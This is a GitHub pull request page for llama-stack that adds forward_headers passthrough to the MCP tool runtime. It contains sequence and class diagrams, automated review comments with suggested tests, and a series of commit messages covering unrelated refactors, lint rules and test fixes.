add forward_headers passthrough to remote::model-context-protocol#2
Conversation
Reviewer's Guide

Adds configurable per-request header forwarding to the remote model-context-protocol tool runtime, reusing a shared forward_headers utility and aligning MCP behavior with the existing inference/safety passthrough patterns, while preserving backward compatibility with legacy mcp_headers and auth handling.

Sequence diagram for MCP tool invocation with forwarded headers

```mermaid
sequenceDiagram
  actor Agent
  participant ModelContextProtocolImpl
  participant ForwardHeadersUtils as ForwardHeadersUtils_build_forwarded_headers
  participant LegacyHeaders as ModelContextProtocolImpl_get_headers_from_request
  participant MCPClient as invoke_mcp_tool
  participant MCPServer as Downstream_MCP_server
  Agent->>ModelContextProtocolImpl: invoke_tool(tool_name, kwargs, authorization?)
  activate ModelContextProtocolImpl
  ModelContextProtocolImpl->>ModelContextProtocolImpl: _get_forwarded_headers_and_auth()
  activate ForwardHeadersUtils
  ModelContextProtocolImpl->>ForwardHeadersUtils: build_forwarded_headers(provider_data, config.forward_headers)
  ForwardHeadersUtils-->>ModelContextProtocolImpl: forwarded_headers
  deactivate ForwardHeadersUtils
  ModelContextProtocolImpl->>ModelContextProtocolImpl: split Authorization from forwarded_headers
  ModelContextProtocolImpl-->>ModelContextProtocolImpl: forwarded_headers_no_auth, forwarded_auth
  ModelContextProtocolImpl->>LegacyHeaders: get_headers_from_request(endpoint)
  activate LegacyHeaders
  LegacyHeaders-->>ModelContextProtocolImpl: legacy_headers (from mcp_headers)
  deactivate LegacyHeaders
  ModelContextProtocolImpl-->>ModelContextProtocolImpl: merged_headers = forwarded_headers_no_auth + legacy_headers
  ModelContextProtocolImpl-->>ModelContextProtocolImpl: effective_auth = authorization param or forwarded_auth
  ModelContextProtocolImpl->>MCPClient: invoke_mcp_tool(endpoint, tool_name, kwargs, headers=merged_headers, authorization=effective_auth)
  activate MCPClient
  MCPClient->>MCPServer: HTTP request with merged_headers and Authorization
  MCPServer-->>MCPClient: HTTP response
  MCPClient-->>ModelContextProtocolImpl: result
  deactivate MCPClient
  ModelContextProtocolImpl-->>Agent: tool result
  deactivate ModelContextProtocolImpl
```
Sequence diagram for inference passthrough with forwarded headers and API key precedence

```mermaid
sequenceDiagram
  actor Client
  participant InferenceAdapter as PassthroughInferenceAdapter
  participant ForwardHeadersUtils as ForwardHeadersUtils_build_forwarded_headers
  participant OpenAI as AsyncOpenAI_client
  participant Downstream as Downstream_inference_service
  Client->>InferenceAdapter: openai_completion(...)
  activate InferenceAdapter
  InferenceAdapter->>InferenceAdapter: _get_openai_client()
  InferenceAdapter->>InferenceAdapter: _build_request_headers()
  InferenceAdapter->>ForwardHeadersUtils: build_forwarded_headers(provider_data, config.forward_headers)
  activate ForwardHeadersUtils
  ForwardHeadersUtils-->>InferenceAdapter: forwarded_headers
  deactivate ForwardHeadersUtils
  InferenceAdapter->>InferenceAdapter: _get_passthrough_api_key_or_none(provider_data?)
  InferenceAdapter-->>InferenceAdapter: api_key_or_none
  alt static_or_per_request_api_key_present
    InferenceAdapter-->>InferenceAdapter: drop forwarded Authorization variants
    InferenceAdapter-->>InferenceAdapter: headers[Authorization] = Bearer api_key
  end
  InferenceAdapter-->>InferenceAdapter: request_headers
  InferenceAdapter->>OpenAI: create AsyncOpenAI(base_url, api_key="", default_headers=request_headers)
  activate OpenAI
  InferenceAdapter->>OpenAI: chat.completions.create(...)
  OpenAI->>Downstream: HTTP request with request_headers
  Downstream-->>OpenAI: HTTP response
  OpenAI-->>InferenceAdapter: completion
  deactivate OpenAI
  InferenceAdapter-->>Client: completion
  deactivate InferenceAdapter
```
Class diagram for forward_headers configs and utilities

```mermaid
classDiagram
  class MCPProviderDataValidator {
    +ConfigDict model_config
    +dict~str, dict~str, str~~ mcp_headers
  }
  class MCPProviderConfig {
    +ConfigDict model_config
    +dict~str, str~ forward_headers
    +list~str~ extra_blocked_headers
    +sample_run_config(forward_headers, extra_blocked_headers, _kwargs) dict~str, Any~
    +validate_forward_headers() MCPProviderConfig
  }
  class PassthroughImplConfig {
    +HttpUrl base_url
    +SecretStr auth_credential
    +dict~str, str~ forward_headers
    +list~str~ extra_blocked_headers
    +validate_forward_headers() PassthroughImplConfig
    +sample_run_config(base_url, api_key, forward_headers, extra_blocked_headers, kwargs) dict~str, Any~
  }
  class PassthroughProviderDataValidator_inference {
    +ConfigDict model_config
    +HttpUrl passthrough_url
    +SecretStr passthrough_api_key
  }
  class PassthroughSafetyConfig {
    +HttpUrl base_url
    +SecretStr api_key
    +dict~str, str~ forward_headers
    +list~str~ extra_blocked_headers
    +validate_forward_headers() PassthroughSafetyConfig
    +sample_run_config(base_url, api_key, forward_headers, extra_blocked_headers, kwargs) dict~str, Any~
  }
  class PassthroughProviderDataValidator_safety {
    +ConfigDict model_config
    +SecretStr passthrough_api_key
  }
  class PassthroughInferenceAdapter {
    +PassthroughImplConfig config
    +initialize() None
    +_get_openai_client() AsyncOpenAI
    +_build_request_headers() dict~str, str~
    +_get_passthrough_api_key_or_none(provider_data) str
    +_get_passthrough_url() str
  }
  class PassthroughSafetyAdapter {
    +PassthroughSafetyConfig config
    +_get_api_key() str
    +_build_forward_headers() dict~str, str~
    +_build_request_headers() dict~str, str~
  }
  class ModelContextProtocolImpl {
    +MCPProviderConfig config
    +_get_forwarded_headers_and_auth() tuple~dict~str, str~, str~
    +get_headers_from_request(mcp_endpoint_uri) dict~str, str~
    +list_runtime_tools(mcp_endpoint, authorization) ListToolDefsResponse
    +invoke_tool(tool_name, kwargs, authorization) Any
  }
  class ForwardHeadersUtils {
    +CORE_BLOCKED_FORWARD_HEADERS : frozenset~str~
    +normalize_header_name(header_name) str
    +is_valid_header_name(header_name) bool
    +get_effective_blocked_forward_headers(extra_blocked_headers) frozenset~str~
    +validate_forward_headers_config(forward_headers, extra_blocked_headers) None
    +build_forwarded_headers(provider_data, forward_headers) dict~str, str~
  }
  MCPProviderConfig ..> ForwardHeadersUtils : uses
  PassthroughImplConfig ..> ForwardHeadersUtils : uses
  PassthroughSafetyConfig ..> ForwardHeadersUtils : uses
  PassthroughInferenceAdapter --> PassthroughImplConfig : has
  PassthroughSafetyAdapter --> PassthroughSafetyConfig : has
  ModelContextProtocolImpl --> MCPProviderConfig : has
  PassthroughInferenceAdapter ..> PassthroughProviderDataValidator_inference : reads provider_data
  PassthroughSafetyAdapter ..> PassthroughProviderDataValidator_safety : reads provider_data
  ModelContextProtocolImpl ..> MCPProviderDataValidator : reads provider_data
  PassthroughImplConfig --|> RemoteInferenceProviderConfig
  PassthroughSafetyAdapter --|> Safety
  PassthroughInferenceAdapter --|> Inference
  ModelContextProtocolImpl --|> NeedsRequestProviderData
```
Hey - I've found 2 issues, and left some high level feedback:
- The warning about `forward_headers` being configured but yielding no matching provider-data keys is now duplicated in multiple adapters (inference, safety, MCP); consider centralizing this into a small helper around `build_forwarded_headers` so the log message and behavior stay consistent in one place.
- In `build_forwarded_headers`, you recompute `len(sanitized.encode())` when logging the oversize warning; you could compute it once into a local variable to avoid double encoding and make the intent clearer.
Prompt for AI Agents
Please address the comments from this code review:
## Overall Comments
- The warning about `forward_headers` being configured but yielding no matching provider-data keys is now duplicated in multiple adapters (`inference`, `safety`, MCP); consider centralizing this into a small helper around `build_forwarded_headers` so the log message and behavior stay consistent in one place.
- In `build_forwarded_headers`, you recompute `len(sanitized.encode())` when logging the oversize warning; you could compute it once into a local variable to avoid double encoding and make the intent clearer.
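The two overall comments above could be addressed along these lines. This is a hypothetical sketch: the helper names, the byte limit, and the wiring are assumptions, not code from the PR:

```python
import logging

logger = logging.getLogger("forward_headers")
MAX_HEADER_VALUE_BYTES = 8192  # illustrative limit, not taken from the PR


def warn_if_no_matches(forward_headers: dict[str, str], built: dict[str, str]) -> dict[str, str]:
    """Single home for the 'configured but nothing matched' warning, so the
    inference, safety, and MCP adapters don't each repeat the log message."""
    if forward_headers and not built:
        logger.warning(
            "forward_headers is configured (%s) but no provider-data keys matched",
            sorted(forward_headers),
        )
    return built


def sanitize_and_check_size(value: str) -> str:
    sanitized = value.replace("\r", "").replace("\n", "")
    # Encode once into a local, instead of re-encoding inside the log call.
    size_bytes = len(sanitized.encode())
    if size_bytes > MAX_HEADER_VALUE_BYTES:
        logger.warning("header value is %d bytes (limit %d)", size_bytes, MAX_HEADER_VALUE_BYTES)
    return sanitized
```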
## Individual Comments
### Comment 1
<location path="tests/integration/tool_runtime/test_passthrough_mcp.py" line_range="183" />
<code_context>
+# ---------------------------------------------------------------------------
+
+
+class TestListRuntimeToolsWiring:
+ async def test_forwarded_headers_passed_to_list_mcp_tools(self, monkeypatch):
+ """forward_headers config causes headers to be passed to list_mcp_tools."""
</code_context>
<issue_to_address>
**suggestion (testing):** Missing tests for interaction between forward_headers and legacy mcp_headers merging in list_runtime_tools
These tests only cover the forwarded-headers path and the no-headers case. Please add a test that:
- Sets `mcp_headers` in the provider data for an endpoint.
- Configures `forward_headers` (e.g. `"tid" -> "X-Tenant-ID"`).
- Asserts that `list_runtime_tools` passes a merged headers dict to `list_mcp_tools`, with the correct precedence between legacy and forwarded headers.
This will validate the backward-compatible path and ensure the new merge logic doesn’t drop or wrongly override legacy headers.
Suggested implementation:
```python
class TestListRuntimeToolsWiring:
    async def test_forwarded_headers_passed_to_list_mcp_tools(self, monkeypatch):
        """forward_headers config causes headers to be passed to list_mcp_tools."""
        from llama_stack_api import URL

        impl = _make_impl(forward_headers={"tid": "X-Tenant-ID"})
        impl.get_request_provider_data = MagicMock(
            return_value=_make_provider_data(tid="acme")
        )  # type: ignore[method-assign]

        captured: dict[str, Any] = {}

        async def fake_list_mcp_tools(endpoint, headers=None, authorization=None, **_):
            captured["headers"] = headers
            captured["authorization"] = authorization

        # Wire our fake into the runtime impl
        monkeypatch.setattr(impl.runtime, "list_mcp_tools", fake_list_mcp_tools)

        # Exercise list_runtime_tools; this should compute forwarded headers
        await impl.list_runtime_tools(URL("https://example.com/mcp"))

        # We only care that the forwarded header mapping is honored
        assert captured["headers"] == {"X-Tenant-ID": "acme"}

    async def test_forwarded_and_legacy_mcp_headers_are_merged(self, monkeypatch):
        """forward_headers and legacy mcp_headers are merged with legacy taking precedence."""
        from llama_stack_api import URL

        # Map request headers -> MCP headers
        impl = _make_impl(
            forward_headers={
                "tid": "X-Tenant-ID",
                "org": "X-Org-ID",
            }
        )
        # Legacy MCP headers configured on the provider
        legacy_mcp_headers = {
            "X-Tenant-ID": "legacy-tenant",  # should win over forwarded value
            "X-Static": "static-value",
        }
        # Request-scoped headers (available for forwarding)
        impl.get_request_provider_data = MagicMock(
            return_value=_make_provider_data(
                tid="forwarded-tenant",
                org="acme-org",
                mcp_headers=legacy_mcp_headers,
            )
        )  # type: ignore[method-assign]

        captured: dict[str, Any] = {}

        async def fake_list_mcp_tools(endpoint, headers=None, authorization=None, **_):
            captured["headers"] = headers
            captured["authorization"] = authorization

        # Wire our fake into the runtime impl
        monkeypatch.setattr(impl.runtime, "list_mcp_tools", fake_list_mcp_tools)

        # Exercise list_runtime_tools; this should merge forwarded and legacy headers
        await impl.list_runtime_tools(URL("https://example.com/mcp"))

        # Expected behavior:
        # - Non-overlapping forwarded headers are included.
        # - Overlapping keys are resolved in favor of legacy mcp_headers (backward compatible).
        assert captured["headers"] == {
            "X-Tenant-ID": "legacy-tenant",  # legacy wins
            "X-Static": "static-value",
            "X-Org-ID": "acme-org",  # only comes from forwarded headers
        }
```
I had to reconstruct parts of the existing `test_forwarded_headers_passed_to_list_mcp_tools` body and the wiring to `impl.runtime.list_mcp_tools` / `impl.list_runtime_tools` based on the incomplete snippet.
To integrate this cleanly, please:
1. Align the use of `URL("https://example.com/mcp")` and the `impl.list_runtime_tools(...)` call with how other tests in this file currently invoke `list_runtime_tools` (e.g., if they pass an endpoint ID or different argument shape, mirror that instead).
2. Ensure `_make_provider_data(...)` actually accepts an `mcp_headers` keyword argument and that it places those headers where `list_runtime_tools` expects to find legacy MCP headers. If the shape differs (e.g., nested under a specific endpoint key), adapt the `return_value` accordingly.
3. If `impl.runtime.list_mcp_tools` lives under a different attribute path or module in your codebase, adjust the `monkeypatch.setattr(...)` calls to match the actual location.
4. If your existing `test_forwarded_headers_passed_to_list_mcp_tools` already has more assertions or setup not visible in the snippet, merge those back into the reconstructed body above so no coverage is lost.
</issue_to_address>
### Comment 2
<location path="tests/integration/tool_runtime/test_passthrough_mcp.py" line_range="263" />
<code_context>
+# ---------------------------------------------------------------------------
+
+
+class TestInvokeToolWiring:
+ async def test_forwarded_headers_passed_to_invoke_mcp_tool(self, monkeypatch):
+ """forward_headers config causes headers to be passed to invoke_mcp_tool."""
</code_context>
<issue_to_address>
**suggestion (testing):** Consider adding a test that legacy mcp_headers are still honored in invoke_tool alongside forwarded headers
Right now this only exercises the `forwarded_headers` path. Please add a test where `provider_data.mcp_headers` is set for the tool endpoint and `forward_headers` also injects a header, then assert that `invoke_mcp_tool` sees both and that the intended precedence between them is preserved. This will cover the backward-compatible headers behavior in `invoke_tool`.
Suggested implementation:
```python
# ---------------------------------------------------------------------------
# invoke_tool wiring tests
# ---------------------------------------------------------------------------


class TestInvokeToolWiring:
    async def test_forwarded_headers_passed_to_invoke_mcp_tool(self, monkeypatch):
        """forward_headers config causes headers to be passed to invoke_mcp_tool."""
        impl = _make_impl(forward_headers={"tid": "X-Tenant-ID", "tok": "Authorization"})
        impl.get_request_provider_data = MagicMock(
            return_value=_make_provider_data(tid="acme", tok="my-token")
        )  # type: ignore[method-assign]

        # mock tool_store
        fake_tool = MagicMock()
        fake_tool.metadata = {"endpoint": "http://mcp-server:8080/sse"}
        impl.tool_store = AsyncMock()
        impl.tool_store.get_tool.return_value = fake_tool

        captured: dict[str, Any] = {}

        async def _capture_invoke_mcp_tool(*args: Any, **kwargs: Any) -> Any:  # pragma: no cover - trivial passthrough
            captured["headers"] = kwargs.get("headers")

        impl.runtime_handler.invoke_mcp_tool = AsyncMock(side_effect=_capture_invoke_mcp_tool)

        await impl.invoke_tool(
            tool_name="some-tool",
            arguments={},
            metadata={},
        )

        assert captured["headers"] == {
            "X-Tenant-ID": "acme",
            "Authorization": "my-token",
        }

    async def test_forwarded_and_legacy_mcp_headers_are_merged_and_forwarded_headers_take_precedence(
        self,
        monkeypatch: Any,
    ) -> None:
        """Both legacy mcp_headers and forward_headers are honored; forward_headers take precedence."""
        impl = _make_impl(forward_headers={"tid": "X-Tenant-ID", "tok": "Authorization"})
        endpoint = "http://mcp-server:8080/sse"

        # Legacy mcp_headers for this endpoint
        legacy_mcp_headers = {
            "Authorization": "legacy-token",
            "X-Legacy": "legacy-value",
        }
        # Request-scoped headers that will be forwarded according to forward_headers
        request_headers = {
            "tid": "acme",
            "tok": "forward-token",
        }
        provider_data = SimpleNamespace(
            headers=request_headers,
            mcp_headers={endpoint: legacy_mcp_headers},
        )
        impl.get_request_provider_data = MagicMock(return_value=provider_data)  # type: ignore[method-assign]

        # mock tool_store
        fake_tool = MagicMock()
        fake_tool.metadata = {"endpoint": endpoint}
        impl.tool_store = AsyncMock()
        impl.tool_store.get_tool.return_value = fake_tool

        captured: dict[str, Any] = {}

        async def _capture_invoke_mcp_tool(*args: Any, **kwargs: Any) -> Any:  # pragma: no cover - trivial passthrough
            captured["headers"] = kwargs.get("headers")

        impl.runtime_handler.invoke_mcp_tool = AsyncMock(side_effect=_capture_invoke_mcp_tool)

        await impl.invoke_tool(
            tool_name="some-tool",
            arguments={},
            metadata={},
        )

        # Expect:
        # - legacy mcp_headers are present
        # - forwarded headers are added
        # - for overlapping keys (e.g. Authorization) forwarded headers win
        assert captured["headers"] == {
            "X-Tenant-ID": "acme",  # from forward_headers mapping tid -> X-Tenant-ID
            "Authorization": "forward-token",  # forwarded value overrides legacy mcp_headers.Authorization
            "X-Legacy": "legacy-value",  # preserved from legacy mcp_headers
        }
```
1. Ensure `SimpleNamespace` is imported at the top of `tests/integration/tool_runtime/test_passthrough_mcp.py`, e.g.:
`from types import SimpleNamespace`.
2. If `impl.invoke_tool` uses different parameter names than `tool_name`, `arguments`, and `metadata`, adjust the call sites in both tests to match the actual signature used elsewhere in this test file.
3. If `get_request_provider_data` expects attributes other than `headers` and `mcp_headers`, extend the `SimpleNamespace` in the new test with those attributes as needed.
</issue_to_address>
Recording workflow completed.

Providers: ollama

Recordings have been generated and will be committed automatically by the companion workflow.
…lamastack#5134)

# What does this PR do?

Adds per-request HTTP header forwarding to the `remote::passthrough` inference provider, following the pattern established by the safety passthrough provider (PR llamastack#5004, already merged).

A `forward_headers` config field maps provider-data keys to outbound HTTP header names. Only explicitly listed keys are forwarded from `X-LlamaStack-Provider-Data` to the downstream service (default-deny). An `extra_blocked_headers` field lets operators add custom blocked names on top of the core security list.

The shared utility `providers/utils/forward_headers.py` is used by both the inference and safety passthrough providers, keeping the forwarding logic and blocked-header policy in one place.

Closes llamastack#5040
Relates llamastack#4607

## Test Plan

Unit tests cover the full path — config validation, header extraction, CRLF sanitization, blocked-header enforcement, auth priority chain, and concurrent request isolation:

```bash
uv run pytest tests/unit/providers/inference/test_passthrough_forward_headers.py -v
```

Tests cover:

- `build_forwarded_headers()` — key mapping, default-deny, CRLF stripping, SecretStr unwrap, case-insensitive dedup
- `validate_forward_headers_config()` — blocked header rejection, operator extra blocklist, invalid names
- Adapter auth priority — static api_key > passthrough_api_key > forwarded Authorization
- Provider data validator — extra fields preserved for forwarding, reserved keys rejected
- Concurrent request isolation — contextvars don't leak between parallel requests

Also tested end-to-end locally against a mock inference server and a mock `/v1/moderations` server. Headers land on the downstream exactly as configured and blocked headers are rejected at stack startup, not at request time.

Example config:

```yaml
providers:
  inference:
    - provider_id: maas-inference
      provider_type: remote::passthrough
      config:
        base_url: ${env.PASSTHROUGH_URL}
        forward_headers:
          maas_api_token: "Authorization"
          tenant_id: "X-Tenant-ID"
```

Callers pass credentials via `X-LlamaStack-Provider-Data`:

```bash
curl http://localhost:8321/v1/chat/completions \
  -H 'X-LlamaStack-Provider-Data: {"maas_api_token": "Bearer user-jwt", "tenant_id": "acme"}' \
  -d '{"model": "passthrough/my-model", "messages": [{"role": "user", "content": "hello"}]}'
```

The downstream receives `Authorization: Bearer user-jwt` and `X-Tenant-ID: acme`. Only keys explicitly listed in `forward_headers` are forwarded to the downstream service. Any keys in `X-LlamaStack-Provider-Data` that don't have a mapping in `forward_headers` are ignored — they never leave the stack. This is the default-deny policy: if it's not in the config, it doesn't get forwarded.
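The default-deny behavior described above can be demonstrated in a few lines. The one-line dict comprehension here stands in for the shared forward_headers utility; `secret_key` is a hypothetical unlisted provider-data key:

```python
import json

# The example config's mapping: provider-data key -> outbound header name.
forward_headers = {"maas_api_token": "Authorization", "tenant_id": "X-Tenant-ID"}

# Caller-supplied X-LlamaStack-Provider-Data, including an unlisted key.
provider_data = json.loads(
    '{"maas_api_token": "Bearer user-jwt", "tenant_id": "acme", "secret_key": "never-leaves"}'
)

# Default-deny: iterate the config, not the provider data, so anything
# without an explicit mapping is simply never considered.
outbound = {
    header: provider_data[key]
    for key, header in forward_headers.items()
    if key in provider_data
}

# secret_key has no mapping in forward_headers, so it never leaves the stack.
assert "never-leaves" not in outbound.values()
```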
Force-pushed from bfbfeb5 to a07a34e.
)

## Summary

- Add Bedrock (`bedrock/openai.gpt-oss-20b`) to the responses test suite in CI
- Pre-register the Bedrock model in the ci-tests distribution config
- Include ~330 newly recorded Bedrock response test recordings (104 passing, 87% coverage)
- Update the provider compatibility matrix to reflect Bedrock coverage

## Test plan

- [x] CI replay tests pass for Bedrock responses suite
- [x] Provider compatibility matrix renders correctly with Bedrock column
- [ ] Provider record job works

---------

Co-authored-by: Sébastien Han <seb@redhat.com>
…ng (llamastack#5265)

# What does this PR do?

Add .pytest_cache/, .mypy_cache/, htmlcov/, *.log, *.swp, *.swo, and *.tsbuildinfo to cover common editor, test, and build artifacts missing from the standard Python/TypeScript gitignore templates.

Improves AgentReady .gitignore_completeness score from 61 to 89/100 (Threshold: ≥70)

Signed-off-by: Eleanor Hu <ehu@redhat.com>
Co-authored-by: Sébastien Han <seb@redhat.com>
…5251)

Adds conventional-pre-commit hook to enforce conventional commit format.

- Recognized by agentready conventional_commits test

Signed-off-by: Derek Higgins <derekh@redhat.com>
Co-authored-by: Sébastien Han <seb@redhat.com>
## Summary

- The `test_openai_chat_completion_is_async` test intermittently fails on CI runners due to a tight timing assertion (2x multiplier on 0.5s sleep)
- Increases the multiplier from 2x to 3x (1.5s threshold), which still validates concurrency (sequential would be 2.0s) while tolerating CI jitter
- Fixes flake seen in https://github.com/llamastack/llama-stack/actions/runs/23495075039

## Test plan

- [x] Verified the threshold still validates concurrency: 4 parallel 0.5s sleeps must complete in < 1.5s (sequential would take 2.0s)
- [ ] CI unit tests pass without flaking

Signed-off-by: Charlie Doern <cdoern@redhat.com>
Co-authored-by: Sébastien Han <seb@redhat.com>
Force-pushed from 9410037 to c430e0d.
# What does this PR do?

Trim README for clarity and structure:

- Add table of contents
- Fix heading hierarchy (H3 → H2 throughout)
- Merge related sections (Documentation + Client SDKs → Resources; Community + Star History + Contributors)
- Fold one-line installer into Overview, remove redundant Benefits sub-section
- Tighten prose throughout

Improves AgentReady Concise Documentation score from 69 to 85/100 (Threshold: ≥75)

Signed-off-by: Eleanor Hu <ehu@redhat.com>
Co-authored-by: Sébastien Han <seb@redhat.com>
Force-pushed from c430e0d to d8f03a9.
Fixes llamastack#5256

# What does this PR do?

Add OpenTelemetry metrics to track which optional parameters callers explicitly provide in Responses API (`POST /v1/responses`) requests. This helps understand API usage patterns and prioritize OpenAI parity work.

Introduces a new counter metric, `llama_stack.responses.parameter_usage_total`, with `operation` and `parameter` attributes.

For a request like:

```bash
curl -X POST http://localhost:8321/v1/responses \
  -H 'Content-Type: application/json' \
  -d '{
    "input": "What is Python?",
    "model": "ollama/llama3.2:3b-instruct-fp16",
    "temperature": 0.7,
    "stream": true,
    "tools": [],
    "instructions": "Be concise"
  }'
```

the following Prometheus metrics are emitted:

```
llama_stack_llama_stack_responses_parameter_usage_total{operation="create_response", parameter="temperature"} 1
llama_stack_llama_stack_responses_parameter_usage_total{operation="create_response", parameter="stream"} 1
llama_stack_llama_stack_responses_parameter_usage_total{operation="create_response", parameter="tools"} 1
llama_stack_llama_stack_responses_parameter_usage_total{operation="create_response", parameter="instructions"} 1
```

```console
(llama-stack) gualiu@gualiu-mac llama-stack % curl -s 'http://localhost:9090/api/v1/query?query=llama_stack_llama_stack_responses_parameter_usage_total' | jq
{
  "status": "success",
  "data": {
    "resultType": "vector",
    "result": [
      {
        "metric": {
          "__name__": "llama_stack_llama_stack_responses_parameter_usage_total",
          "exported_job": "llama-stack-server",
          "instance": "otel-collector:9464",
          "job": "otel-collector",
          "operation": "create_response",
          "otel_scope_name": "llama_stack.responses",
          "otel_scope_version": "1.0.0",
          "parameter": "instructions"
        },
        "value": [1774293626.183, "7"]
      },
      {
        "metric": {
          "__name__": "llama_stack_llama_stack_responses_parameter_usage_total",
          "exported_job": "llama-stack-server",
          "instance": "otel-collector:9464",
          "job": "otel-collector",
          "operation": "create_response",
          "otel_scope_name": "llama_stack.responses",
          "otel_scope_version": "1.0.0",
          "parameter": "stream"
        },
        "value": [1774293626.183, "7"]
      },
      {
        "metric": {
          "__name__": "llama_stack_llama_stack_responses_parameter_usage_total",
          "exported_job": "llama-stack-server",
          "instance": "otel-collector:9464",
          "job": "otel-collector",
          "operation": "create_response",
          "otel_scope_name": "llama_stack.responses",
          "otel_scope_version": "1.0.0",
          "parameter": "temperature"
        },
        "value": [1774293626.183, "4"]
      },
      {
        "metric": {
          "__name__": "llama_stack_llama_stack_responses_parameter_usage_total",
          "exported_job": "llama-stack-server",
          "instance": "otel-collector:9464",
          "job": "otel-collector",
          "operation": "create_response",
          "otel_scope_name": "llama_stack.responses",
          "otel_scope_version": "1.0.0",
          "parameter": "tools"
        },
        "value": [1774293626.183, "4"]
      }
    ]
  }
}
```

Co-authored-by: Sébastien Han <seb@redhat.com>
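A minimal sketch of the explicit-parameter detection the metric relies on; `TRACKED_PARAMS` and the function name are illustrative stand-ins, not the actual implementation:

```python
# Count only parameters the caller explicitly provided in the request body,
# so defaults applied server-side don't inflate the metric.
TRACKED_PARAMS = ("temperature", "stream", "tools", "instructions")

def explicitly_provided(payload: dict) -> list[str]:
    # Presence of the key in the JSON body counts as explicit usage,
    # even with a falsy value such as [] or false.
    return [p for p in TRACKED_PARAMS if p in payload]
```

Each returned name would then increment the counter once, with `operation="create_response"` and `parameter=<name>` attributes.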
Force-pushed d8f03a9 to f04296b
…ck#5271)

- Adds a `markdownlint-cli` pre-commit hook with `--fix` to enforce consistent markdown style across the repository
- Fixes all existing violations across 75 files, one rule enabled per commit for easier review
- Updates Jinja doc templates (`dell`, `nvidia`, `oci`) and codegen scripts (`provider_compat_matrix.py`) to ensure generated docs converge with markdownlint

### Commit-by-commit rule fixes

1. **MD003** — heading style consistency (atx, no closing hashes)
2. **MD024** — no duplicate sibling headings
3. **MD045** — image alt text
4. **MD051** — valid link fragments
5. **MD025** — single top-level heading per document
6. **MD055** — consistent table pipe style
7. **MD059** — descriptive link text (no bare `[here]` links)
8. **MD001** — heading level increment
9. **MD036** — no emphasis as heading (with `markdownlint-disable` for legitimate uses)
10. **MD040** — fenced code blocks must have language specified

### Permanently disabled rules

| Rule | Reason |
|------|--------|
| MD013 | Line length — URLs, badges, and tables often exceed any reasonable limit |
| MD033 | Inline HTML — project uses `<details>`, `<summary>`, and other HTML |
| MD041 | First line heading — generated reports and some docs don't follow this |
| MD060 | Table column style — cosmetic pipe alignment, not auto-fixable, 300+ violations |

## Test plan

- [x] `npx markdownlint-cli '**/*.md'` reports zero violations
- [x] `uv run pre-commit run --all-files` passes (including codegen convergence hooks)
- [x] Distribution template codegen (`distro_codegen.py`) produces identical output on repeated runs

---------

Signed-off-by: Eoin Fennessy <efenness@redhat.com>
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: mergify[bot] <37929162+mergify[bot]@users.noreply.github.com>
Force-pushed f04296b to 1884f72
## Summary

Remove the `starter-gpu` distribution, which is functionally identical to `starter`. The only difference was the `post_training` provider (`inline::huggingface-gpu` vs `inline::torchtune-cpu`), but the fine-tuning/post-training API is no longer supported. All other providers, configs, and build specs were identical.

No external references to `starter-gpu` exist anywhere in the codebase — CI workflows, docs, tests, and scripts all only reference `starter`.

## Test plan

- [x] `distro_codegen.py` runs clean without starter-gpu
- [x] `provider_codegen.py` runs clean
- [x] Unit tests pass
- [x] No references to `starter-gpu` remain in CI, docs, or tests

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Signed-off-by: Sébastien Han <seb@redhat.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Force-pushed 1884f72 to fff9fb0
## Summary

**Breaking change** — renames the internal `agents` API to `responses` to better reflect its purpose: it implements the OpenAI Responses API.

### Changes

- `Api.agents` → `Api.responses` (enum value)
- Provider directory: `providers/inline/agents/` → `providers/inline/responses/`
- Provider registry: `registry/agents.py` → `registry/responses.py`
- API module: `llama_stack_api/agents/` → `llama_stack_api/responses/`
- Classes: `BuiltinAgentsImpl` → `BuiltinResponsesImpl`
- Config sections: `agents:` → `responses:` in all distribution YAMLs
- File: `agents.py` → `impl.py` (avoids collision with `responses/` subpackage)

### Breaking for

- User config files with `agents:` provider section → must change to `responses:`
- Code using `Api.agents` → must use `Api.responses`
- Imports from `llama_stack_api.agents` → must use `llama_stack_api.responses`

### Migration

Could add deprecated aliases to soften the transition — looking for feedback on approach.

## Test plan

- [x] 217 unit tests pass
- [ ] CI passes

🤖 Generated with [Claude Code](https://claude.com/claude-code)

---------

Signed-off-by: Sébastien Han <seb@redhat.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Force-pushed fff9fb0 to 7a6fc8d
Replace the weak thread-alive check with an actual port connectivity test to prevent connection-refused errors in docker mode integration tests.

Testing whether this is the cause of the flakes.

Signed-off-by: Derek Higgins <derekh@redhat.com>
Force-pushed 7a6fc8d to 179042a
…ssing keys (llamastack#5289)

All other KVStore backends (SQLite, Redis, MongoDB, Postgres) silently ignore deletes on non-existent keys; this is the standard behavior of `DELETE` in SQL, `delete_one` in MongoDB, and `DEL` in Redis. The in-memory implementation was the only one that raised `KeyError`, breaking the implicit API contract and causing code that works with production backends to fail when switched to the in-memory store for testing.

The fix changes `InmemoryKVStoreImpl.delete()` to use `self._store.pop(key, None)` instead of `del self._store[key]`, so deleting a non-existent key is a silent no-op rather than raising `KeyError`.

Co-authored-by: mergify[bot] <37929162+mergify[bot]@users.noreply.github.com>
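The one-line fix amounts to the following; this is a simplified stand-in for `InmemoryKVStoreImpl`, not the actual class:

```python
# Simplified stand-in for the in-memory KVStore delete fix.
class InMemoryStore:
    def __init__(self) -> None:
        self._store: dict[str, str] = {}

    def set(self, key: str, value: str) -> None:
        self._store[key] = value

    def delete(self, key: str) -> None:
        # Before: `del self._store[key]` raised KeyError on missing keys.
        # After: pop with a default makes deletion a silent no-op, matching
        # SQL DELETE, MongoDB delete_one, and Redis DEL.
        self._store.pop(key, None)
```

With this change, code exercised against a production backend behaves identically when pointed at the in-memory store in tests.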
Force-pushed 179042a to 7f6d945
# What does this PR do?

Splits 5 Python files that exceeded 1000 lines into smaller, focused modules. Pure refactoring with no behavior changes. All public names remain importable from the same paths.

| Original file | Lines | Split into |
|---|---|---|
| `src/llama_stack/models/llama/sku_list.py` | 1029 → 915 | `sku_list_download.py` (128L) |
| `scripts/openapi_generator/schema_transforms.py` | 1062 → 871 | `_schema_output.py` (217L) |
| `tests/unit/.../vertexai/test_adapter.py` | 1578 | `test_adapter_core.py` (365L), `test_adapter_chat.py` (651L), `test_adapter_params.py` (477L) |
